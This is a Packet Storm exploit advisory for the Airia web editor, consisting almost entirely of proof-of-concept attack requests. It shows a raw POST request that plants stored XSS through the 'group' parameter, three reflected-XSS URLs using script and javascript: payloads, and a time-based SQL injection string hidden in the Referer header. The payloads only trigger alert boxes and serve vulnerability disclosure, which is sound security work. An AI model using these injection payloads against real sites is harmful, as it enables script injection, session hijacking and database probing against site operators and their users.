Airia Cross Site Scripting

2016-06-20T00:00:00
ID PACKETSTORM:137552
Type packetstorm
Reporter HaHwul
Modified 2016-06-20T00:00:00

Description

                                        
                                            `# Exploit Title: Airia - Multiple XSS Vulnerability(Stored/Reflected)  
# Date: 2016-06-20  
# Exploit Author: HaHwul  
# Exploit Author Blog: www.hahwul.com  
# Vendor Homepage: http://ytyng.com  
# Software Link: https://github.com/ytyng/airia/archive/master.zip  
# Version: Latest commit  
# Tested on: Debian [wheezy]  
  
### Stored XSS  
POST /vul_test/airia/editor.php HTTP/1.1  
Host: 127.0.0.1  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  
Connection: close  
Referer: http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 73  
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; DBSR_session=01ltbc0gf3i35kkcf5f6o6hir1; __utma=96992031.1679083892.1466384142.1466384142.1466384142.1; __utmb=96992031.2.10.1466384142; __utmc=96992031; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)  
  
mode=save&file=1&scrollvalue=&contents=1&group=yyyyyz');alert(45);alert('  
  
-> response: http://127.0.0.1/vul_test/airia/ > onclick method   
-> group, file [weak]  
===============================================================================================  
  
### Reflected XSS  
http://127.0.0.1/vul_test/airia/?group=&file=9921"><frame src="javascript:alert(45)   
-> file [weak]  
-> group [weak]  
  
http://127.0.0.1/vul_test/airia/editor.php?file=hwul --><script>alert(45)</script>><!--  
-> file [weak]  
-> group [weak]  
  
http://127.0.0.1/vul_test/airia/menu.php?group=a3--><script>alert(45)<%2fscript>  
-> group [weak]  
  
`